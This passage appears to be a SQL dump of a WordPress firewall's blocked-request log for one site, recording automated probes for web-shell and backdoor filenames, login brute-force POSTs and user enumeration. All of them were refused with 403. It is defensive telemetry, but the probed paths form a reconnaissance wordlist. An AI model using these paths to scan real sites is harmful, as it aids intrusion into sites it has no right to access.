Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','bsK1ZVO0LpA6ofN2GnMhvcXl',0,1636587390.4734,413,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/wp-content/themes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','sEiT1oN0Ic2nAUPfOdrR3xCk',0,1636587393.7935,479,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/wp-content/plugins/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','OUXR1juq8Sya39TfnNV5vHAQ',0,1636587398.1666,395,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/wp-includes/css/wp-config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','kdDCu4cg0fIlJUQNtVEeX8sW',0,1636587401.3249,413,'','POST',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/wp-content/plugins/ubh/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','jhpfYm1q5FJgWDvGVS8e6K03',0,1636587404.6780,444,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/wp-includes/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','HLO8ty6GBxU7e4d0NFivz9Tn',0,1636587408.9316,419,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/wp-content/plugins/wpconfig.bak.php?act=sf','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','mSQdWY6wz9ckJKhFVl8OaECp',0,1636587413.1324,378,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/haders.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','mPJTUhtvxigVWfM8IqBdsayF',0,1636587417.2462,407,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/wp-content/wp-old-index.php?action=login&pass=-1&submit=','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','WiqkmIB8pZclJaQENng0TDXh',0,1636587422.0030,464,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/legion.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','xu5Mz8i2FDIRJkZ0nEKUdwjt',0,1636587425.1618,403,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/wp-content/mu-plugins/db-safe-mode.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','dntgDr62BqoHvlbAjKeyZhzL',0,1636587430.3444,464,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/wp-includes/lfx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','qFuZPJ27Yj5xeVXDrEz0TiSK',0,1636587434.0463,426,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/wp-includes/small.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','z7hyXCnmWIJ29VSbjUGoFrME',0,1636587437.8165,389,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','0xjunYAFIEiwpCNJ6Lm9Rrvy',0,1636587441.2283,419,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','AUketIju3p4ZmE5ycbhJn0sG',0,1636587445.1198,411,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/config.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','yUZb1PjV7J5vqigCOD2s9kwn',0,1636587449.0609,375,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/test.php?Ghost=send','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','pwmTUizOXcMRahNlV2ugeZy9',0,1636587452.8399,420,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/wp-content/langar.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','l5N7zS6Jv1P3WgUVnHTXOAbM',0,1636587456.4425,405,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','eyMt4hgou5n8wABlX3IzJW2k',0,1636587460.5666,386,'','GET',403,0,700,0,1,'',0),('217.160.192.178',3651190962,'','https://ashbooks.co.uk/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','7SgE0OefRGu2Nk6YDAxTsUH5',0,1636587465.1004,472,'','GET',403,0,700,0,1,'',0),('82.208.189.233',1389411817,'','https://ashbooks.co.uk/xmrlpc.php?daksldlkdsadas=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64; rv:51.0) Gecko\\/20100101 Firefox\\/51.0\"}','j8LW4mFSRENQtfx57qHrZMa2',0,1636589984.1761,694,'','GET',403,0,700,0,1,'',0),('5.188.62.76',96222796,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2227.1 Safari\\/537.36\"}','5Q24cTEl9UNdpGkMHjnyg610',0,1636594183.9035,484,'','POST',403,0,600,0,1,'',0),('185.238.75.78',3119401806,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','1VJUNjG0TKI8OYsDRbWS5tv6',0,1636604096.7201,2640,'','POST',403,0,600,0,1,'',0),('5.188.62.76',96222796,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2228.0 Safari\\/537.36\"}','ZPJcC3YFr96N0VEQfKhTmAoX',0,1636604768.7321,442,'','POST',403,0,600,0,1,'',0),('5.9.57.242',84490738,'','https://ashbooks.co.uk/wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','7Y0nDd8MVG63uybczCigAfRv',0,1636605082.8650,171,'','GET',403,0,520,0,1,'',0),('82.208.189.233',1389411817,'','https://ashbooks.co.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko\\/20100101 Firefox\\/49.0\"}','JKFR7ucqaU6dXYE13WwLDBI4',0,1636605489.1271,712,'','GET',403,0,700,0,1,'',0),('3.127.83.243',58676211,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','CEYwK4lWRQNkapeZ1SAiUdqm',0,1636610009.8437,644,'','POST',403,0,600,0,1,'',0),('116.203.244.229',1959523557,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.87 Safari\\/537.36\"}','dOxmhXysVNv2afinG38KMt5w',0,1636610828.9778,2132,'','POST',403,0,600,0,1,'',0),('5.253.62.82',100482642,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','HsEGIFyYijAkt5xgdcP9pWXn',0,1636612228.0413,553,'','POST',403,0,600,0,1,'',0),('109.87.200.193',1834469569,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/59.0.3071.115 Safari\\/537.36\"}','qwRfL4x6IrT13GlnAHhgNisV',0,1636612916.1030,1087,'','POST',403,0,600,0,1,'',0),('144.76.102.246',2420926198,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/49.0.2623.112 Safari\\/537.36\"}','4RA7EOftZkm0qGnuzHJcDUIr',0,1636613656.9517,542,'','POST',403,0,600,0,1,'',0),('69.163.225.120',1168367992,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','x1gYtoI9SlUV0iAe8LFBCT6Q',0,1636614482.7590,447,'','POST',403,0,600,0,1,'',0),('5.188.62.76',96222796,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2224.3 Safari\\/537.36\"}','8OGk4U6egL9FD3ZQ0Yj5bwEv',0,1636615368.0471,466,'','POST',403,0,600,0,1,'',0),('23.88.38.58',391652922,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/77.0.3865.90 Safari\\/537.36\"}','5VXrmMoIpRKZt7znDGyesw9S',0,1636615948.4837,544,'','POST',403,0,600,0,1,'',0),('184.72.185.46',3091773742,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.109 Safari\\/537.36\"}','g80FtkNK1GIhO3X2CuBaU5oz',0,1636617331.2469,1153,'','POST',403,0,600,0,1,'',0),('45.40.166.141',757638797,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','RZonmrlb5yHgTPuiL4FEqsSM',0,1636618075.7164,471,'','POST',403,0,600,0,1,'',0),('5.39.95.36',86466340,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','TAevUCLIgHZMx7lPkzsutSXh',0,1636618769.7791,650,'','POST',403,0,600,0,1,'',0),('144.76.102.246',2420926198,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1700.107 Safari\\/537.36\"}','CXdmvIi8SLFKEBNrMQkRVUZ1',0,1636619497.4667,567,'','POST',403,0,600,0,1,'',0),('95.217.195.206',1608106958,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.101 Safari\\/537.36\"}','yHZeRG2kxthEjPqpsBOALMUK',0,1636620282.5706,461,'','POST',403,0,600,0,1,'',0),('45.40.166.142',757638798,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','0VGakfXo7dW2C9ipF8J5PzMv',0,1636621080.4192,474,'','POST',403,0,600,0,1,'',0),('162.240.16.237',2733641965,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','4AS8N9sWhEcpku65zDXo0nm2',0,1636622680.2064,675,'','POST',403,0,600,0,1,'',0),('176.109.191.65',2959982401,'','https://ashbooks.co.uk/wp-content/themes/sketch/404.php','','{\"1\":\"\"}','n8jvNYQpxCbutGa2i1KDqRkW',0,1636623287.2542,410,'','GET',403,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.114 Safari\\/537.36\"}','SicPpCgMeUjBGIQu19Nq563h',0,1636623455.5252,2909,'','GET',403,0,520,0,1,'',0),('167.172.69.81',2813085009,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.101 Safari\\/537.36\"}','8yvWzr2eI1RlxAJ5MTcGU0ON',0,1636623458.5761,1823,'','POST',403,0,600,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk//wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.114 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\\/\\/wp-login.php\"}','0t6dhFyep5NfJgW12jZqYMcI',0,1636623460.6919,2998,'','POST',403,0,600,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/wp-includes/css/modules.php','','{\"1\":\"python-requests\\/2.26.0\"}','zbXnVOpHrDk9RNuSeL35dsWa',0,1636624523.0299,1055,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/wso.php','','{\"1\":\"python-requests\\/2.26.0\"}','97EckgWuxm4dIz30qKR2pNv8',0,1636624549.6205,1371,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/wp-content/plugins/upspy/index.php','','{\"1\":\"python-requests\\/2.26.0\"}','mLIgNZ3we5RKQS8XuEGlBqPs',0,1636624575.8995,938,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/wp-content/plugins/ubh/index.php','','{\"1\":\"python-requests\\/2.26.0\"}','UhAbDvNfEZHLrCseunBFgmOi',0,1636624600.5923,868,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/wp-content/plugins/vwcleanerplugin/bump.php?cache','','{\"1\":\"python-requests\\/2.26.0\"}','lA8Zrz1xak6TtGyi54XOvVYN',0,1636624603.9306,1208,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/wp-content/plugins/xichang/x.php?xi','','{\"1\":\"python-requests\\/2.26.0\"}','E9bxcBm8jJT5diQSICvglWzs',0,1636624606.5346,1040,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/wp-admin/shapes.php','','{\"1\":\"python-requests\\/2.26.0\"}','iXJBaE0R2C9VoK6wTADuHYhm',0,1636624613.2943,1349,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/olux.php','','{\"1\":\"python-requests\\/2.26.0\"}','ZlqircL0DK4knQsX2w6bWFg3',0,1636624615.9325,769,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/indoxploit.php','','{\"1\":\"python-requests\\/2.26.0\"}','tzC5r4yVNlLDskqKbeZJQTUa',0,1636624618.0021,1554,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/up.php','','{\"1\":\"python-requests\\/2.26.0\"}','G0sWMdElcax4peUCLZfn3Oo6',0,1636624624.0500,1074,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/upload.php','','{\"1\":\"python-requests\\/2.26.0\"}','EXWgOeUztHnphV9KTvJl504B',0,1636624626.4279,1051,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/shell.php','','{\"1\":\"python-requests\\/2.26.0\"}','0MeOb3qBkUwhxoCcVtNF7TSZ',0,1636624632.0764,843,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/wp-admin/network/wp-footer.php','','{\"1\":\"python-requests\\/2.26.0\"}','vq1ds6Pc8RSIZnObVDEg3mlF',0,1636624634.3110,1144,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/wp-info.php','','{\"1\":\"python-requests\\/2.26.0\"}','oqxtLEYROCc8ZgAH19QIe647',0,1636624636.6114,1058,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/wp-content/vuln.php','','{\"1\":\"python-requests\\/2.26.0\"}','evjsXgn3PrZ48xtQ12U0OhMW',0,1636624638.8175,958,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/upel.php','','{\"1\":\"python-requests\\/2.26.0\"}','3SABYEGZPtNCrLkn9FfliKdj',0,1636624641.2151,963,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/wp-content/plugins/ppus/up.php','','{\"1\":\"python-requests\\/2.26.0\"}','Ck8jTNKZXyUx0tgWBvSwJpl7',0,1636624643.4541,928,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/098.php','','{\"1\":\"python-requests\\/2.26.0\"}','czdurD09WMpx2ZHneC56U13s',0,1636624645.7671,1104,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/V5.php','','{\"1\":\"python-requests\\/2.26.0\"}','MiBRCVp7OoFJQj43XWADHK6U',0,1636624648.0784,1051,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/new_license.php','','{\"1\":\"python-requests\\/2.26.0\"}','05r1xwven27KTLQcRNpXGMWO',0,1636624650.4576,542,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/wp-content/plugins/theme-configurator/mini.php','','{\"1\":\"python-requests\\/2.26.0\"}','V8iwaLCXdKIRGo5DNeZsWBTH',0,1636624652.1058,1129,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/wp-content/plugins/widget-logic/mini.php','','{\"1\":\"python-requests\\/2.26.0\"}','GQxiPuCg0hsOalfvzFqrZKbH',0,1636624654.5446,1417,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/wso.php','','{\"1\":\"python-requests\\/2.26.0\"}','3vDeRIYMpfkwAh9lXHNBng18',0,1636624671.6117,1095,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/modules/modules/modules.php','','{\"1\":\"python-requests\\/2.26.0\"}','pTh0vuR7W6UIlEgNtVZnmkbz',0,1636624673.9471,1116,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/modules/mod_simplefileuploadv1.3/elements/Clean.php','','{\"1\":\"python-requests\\/2.26.0\"}','RtELe8ghJVunXmYvNCAosQbq',0,1636624676.3416,1245,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/modules/mod_simplefileuploadv1.3/elements/udd.php','','{\"1\":\"python-requests\\/2.26.0\"}','0M8gijHfZRUIPAXCTJnODwxB',0,1636624679.5317,1357,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/libraries/joomla/css.php','','{\"1\":\"python-requests\\/2.26.0\"}','1psE4HJO9Fvwqy7DRcMn2SL6',0,1636624682.1294,957,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/libraries/joomla/jmails.php?u','','{\"1\":\"python-requests\\/2.26.0\"}','IhRZr8WDzanwkiHLcT7oXq9p',0,1636624684.3133,982,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/libraries/joomla/jmail.php?u','','{\"1\":\"python-requests\\/2.26.0\"}','xBfqrYAbVHiztIQ7J4WS68kO',0,1636624686.5070,1134,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/images/vuln.php','','{\"1\":\"python-requests\\/2.26.0\"}','bPU79ZjYAeVB4r0qukcmwSDh',0,1636624688.8816,1282,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/tmp/vuln.php','','{\"1\":\"python-requests\\/2.26.0\"}','QmiK6qPre3FWubvJAl1aGsB7',0,1636624691.4016,1093,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/XxX.php','','{\"1\":\"python-requests\\/2.26.0\"}','0BDzS58TlrJuAtFymhHZVj4I',0,1636624693.7490,1118,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/Marvins.php','','{\"1\":\"python-requests\\/2.26.0\"}','1h8qAtfC7cLm2E69sJa5BkPK',0,1636624696.1070,690,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/rxr.php?rxr','','{\"1\":\"python-requests\\/2.26.0\"}','y6kJTznGVgQvqAaeNLoxOdIK',0,1636624698.1394,729,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/olux.php','','{\"1\":\"python-requests\\/2.26.0\"}','sPHXBDUfr8ZnYb6zgQ9OAqGi',0,1636624700.3523,921,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/indoxploit.php','','{\"1\":\"python-requests\\/2.26.0\"}','pfg5XzZcubDIEh4Lx6i7KT3M',0,1636624702.5637,1399,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/error.php','','{\"1\":\"python-requests\\/2.26.0\"}','BliDy2woWxtFYSZJIvCaqOc7',0,1636624705.1971,1207,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/RxR.php','','{\"1\":\"python-requests\\/2.26.0\"}','Uqeu6tbS4moEALj5Fn08gfNc',0,1636624707.7200,1022,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/components/com_b2jcontact/izoc.php','','{\"1\":\"python-requests\\/2.26.0\"}','Cvg35OUJ0y9NqteGVXMdnRP8',0,1636624710.0346,999,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/V3.php','','{\"1\":\"python-requests\\/2.26.0\"}','bLRHojVaOG3I4MWApSUCmiy6',0,1636624712.4246,2442,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/V5.php','','{\"1\":\"python-requests\\/2.26.0\"}','k5u4pqYrOUKQldAXHtILEz10',0,1636624716.1975,515,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/up.php','','{\"1\":\"python-requests\\/2.26.0\"}','dRixna84MZfXOzTFksopBlgN',0,1636624719.9606,727,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/upload.php','','{\"1\":\"python-requests\\/2.26.0\"}','eoTm3ty79uzJNscL6SdV2WKB',0,1636624721.8373,1038,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/shell.php','','{\"1\":\"python-requests\\/2.26.0\"}','1F9NSrkKJfGUjl6EV3YPcXsO',0,1636624724.2746,901,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/administrator/templates/bluestork/index.php','','{\"1\":\"python-requests\\/2.26.0\"}','SWDl9GuymH0IBsYanU25Oket',0,1636624726.5092,492,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/administrator/templates/bluestork/error.php','','{\"1\":\"python-requests\\/2.26.0\"}','b8d9xCeRvlXY1nmB7DwkfoU2',0,1636624728.0439,846,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/administrator/templates/hathor/index.php','','{\"1\":\"python-requests\\/2.26.0\"}','pQmsRFzv2dPWYBl7gLqKHjx9',0,1636624730.0609,1269,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/administrator/templates/hathor/error.php','','{\"1\":\"python-requests\\/2.26.0\"}','Qv2TPBgKnfjRypwZVMthFC8l',0,1636624732.4636,941,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/administrator/templates/isis/index.php','','{\"1\":\"python-requests\\/2.26.0\"}','nT5qHYplBDhNQPWM02A6yFJE',0,1636624734.4030,754,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/administrator/templates/isis/error.php','','{\"1\":\"python-requests\\/2.26.0\"}','dxgG7ZpMqU6YEXob1keHs5Aw',0,1636624736.4857,952,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/templates/beez/index.php','','{\"1\":\"python-requests\\/2.26.0\"}','NuKAJ9dryqV0Rs6pvH4CiSj5',0,1636624738.9460,578,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/templates/ja_purity/index.php','','{\"1\":\"python-requests\\/2.26.0\"}','oFB7fEYKgOk2TNlZD9d3tzSh',0,1636624740.7594,832,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/templates/rhuk_milkyway/index.php','','{\"1\":\"python-requests\\/2.26.0\"}','IqKu9jMTsdEz4Uc2HPmp1N5r',0,1636624742.8625,811,'','GET',403,0,700,0,1,'',0),('20.112.113.120',342913400,'','https://ashbooks.co.uk/templates/system/index.php','','{\"1\":\"python-requests\\/2.26.0\"}','p8DbMjC7KasnJ